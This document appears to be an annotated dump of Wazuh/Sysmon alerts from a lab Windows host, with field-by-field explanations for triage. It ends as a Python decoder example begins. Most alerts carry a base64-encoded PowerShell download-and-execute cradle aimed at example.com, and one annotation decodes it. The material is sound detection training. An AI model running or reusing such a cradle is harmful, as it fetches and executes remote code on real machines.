data.win.eventdata.processGuid: {94294ddc-c170-680a-e10c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9948 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 122 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535347.2727295 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:45.3706619Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350393 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:45.357
ProcessGuid: {94294ddc-c170-680a-e10c-000000000e00}
ProcessId: 9224
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2wwl0blf.ude.ps1
CreationUtcTime: 2025-04-24 22:55:45.355
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:45.357 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c170-680a-e10c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2wwl0blf.ude.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:45.355 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 119 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535352.2730060 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:49.9714983Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350420 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:46.414
ProcessGuid: {94294ddc-c172-680a-e30c-000000000e00}
ProcessId: 8356
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c170-680a-e10c-000000000e00}
ParentProcessId: 9224
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:46.414 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c172-680a-e30c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c170-680a-e10c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 123 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535352.2738123 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:50.2371884Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350424 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:50.233
ProcessGuid: {94294ddc-c172-680a-e30c-000000000e00}
ProcessId: 8356
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_keqzo4et.k23.ps1
CreationUtcTime: 2025-04-24 22:55:50.233
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:50.233 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c172-680a-e30c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_keqzo4et.k23.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:50.233 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 120 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535356.2740888 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:54.0942354Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350473 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:52.709
ProcessGuid: {94294ddc-c178-680a-e60c-000000000e00}
ProcessId: 12424
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c172-680a-e30c-000000000e00}
ParentProcessId: 8356
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:52.709 When Sysmon observed the process start (UTC). Use this, not systemTime, for the timeline.
data.win.eventdata.processGuid: {94294ddc-c178-680a-e60c-000000000e00} Sysmon's unique ID for the process; it survives PID reuse and reboots. Join key: later events from this process carry it as processGuid, its children carry it as parentProcessGuid.
data.win.eventdata.processId: 12424 Windows PID. PIDs are reused after exit, so pivot on processGuid instead.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executed binary.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version string from the binary's PE version resource.
data.win.eventdata.description: Windows PowerShell Description from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product name from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company from the PE version resource; an unexpected vendor, or one that does not fit the path, is a lead.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name from the PE version resource; compare it with the file name in image to spot renamed binaries.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line; the doubled backslashes are JSON escaping. The -EncodedCommand argument is base64 over UTF-16LE and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle. The powershell.exe path appearing twice in front of it is itself unusual.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as (DOMAIN\user). The domain part equals the hostname, so this is a local account.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Logon session the process belongs to; correlate with Security event 4624 to see how the session was created.
data.win.eventdata.logonId: 0x26584 The same logon session as a hex logon ID (LUID).
data.win.eventdata.terminalSessionId: 1 Windows session number; 1 = interactive desktop session, 0 = services.
data.win.eventdata.integrityLevel: Medium Medium = not elevated; High = running as administrator.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash(es) of the image, as configured in Sysmon. Pivot for reputation lookups and for spotting a swapped binary.
data.win.eventdata.parentProcessGuid: {94294ddc-c172-680a-e30c-000000000e00} Sysmon GUID of the parent; find the Process Create event whose processGuid equals this to walk up the tree.
data.win.eventdata.parentProcessId: 8356 Parent's PID at the time of the spawn.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Parent's binary; the same as image here, i.e. PowerShell spawning PowerShell.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's command line; identical to commandLine, so the process is re-launching itself with the same encoded payload.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
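The three Process Create alerts on this page form a single chain (PID 8356 spawned 12424, which spawned 17020, which spawned 384) and every hop carries the same -EncodedCommand. The following is an added example, not code from the page or from Wazuh: it decodes the payload the way PowerShell encodes it (base64 over UTF-16LE) and follows parentProcessGuid links to measure how deep the self-respawning chain goes. The event dicts are constructed from the values shown in the alerts above; the regex for the -EncodedCommand abbreviations and the download-cradle keyword list are the example's own assumptions, not PowerShell's parser or Wazuh's rule logic.

```python
import base64
import re

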